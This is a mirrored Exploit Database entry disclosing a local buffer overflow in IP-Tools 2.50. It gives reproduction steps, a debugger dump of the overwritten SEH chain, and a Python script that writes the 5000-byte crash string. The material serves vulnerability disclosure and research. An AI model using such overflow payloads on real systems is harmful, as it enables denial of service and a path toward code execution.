IP-Tools 2.50 – Local Buffer Overflow (PoC)

• Exploit Database
• 111 阅读

• 作者： Rafael Pedrero
  日期： 2019-01-30
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46286/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

  # Exploit Title: IP TOOLS v2.50 - Denial of Service (PoC) and SEH overwritten Crash PoC # Discovery by: Rafael Pedrero # Discovery Date: 2018-12-20 # Vendor Homepage: https://www.ks-soft.net/ip-tools.eng/index.htm # Software Link : https://www.ks-soft.net/ip-tools.eng/index.htm / https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe # Tested Version: 2.50 # Tested on: Windows XP SP3 # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow   # Steps to Produce the Crash: # 1.- Run IP-Tools.exe # 2.- Go to SNMP Scanner tab and copy content of IPTools_Crash.txt to clipboard # 3.- Paste the content into the field: 'From Addr' and 'To Addr' # 4.- Click 'Start' button and you will see a crash.     ''' SEH chain of main thread AddressSE handler 0012F4B4 43434343 42424242 *** CORRUPT ENTRY ***       EAX 0012F4CC ECX 00000000 EDX 44444444 EBX 0012F4CC ESP 0012E490 EBP 0012F4DC ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD ESI 0012E4A4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EDI 02256720 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EIP 00403F70 IP-TOOLS.00403F70 C 0ES 0023 32bit 0(FFFFFFFF) P 1CS 001B 32bit 0(FFFFFFFF) A 0SS 0023 32bit 0(FFFFFFFF) Z 0DS 0023 32bit 0(FFFFFFFF) S 0FS 003B 32bit 7FFDD000(FFF) T 0GS 0000 NULL D 0 O 0LastErr ERROR_SUCCESS (00000000) EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G) ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty 3 2 1 0E S P U O Z D I FST 0120Cond 0 0 0 1Err 0 0 1 0 0 0 0 0(LT) FCW 1372Prec NEAR,64Mask1 1 0 0 1 0 '''   #!/usr/bin/env python   junk = "\x41" * 4112 crash = junk + "BBBB" + "CCCC" + "D" * (5000 - len(junk) - 8) f = open ("IPTools_Crash.txt", "w") f.write(crash) f.close()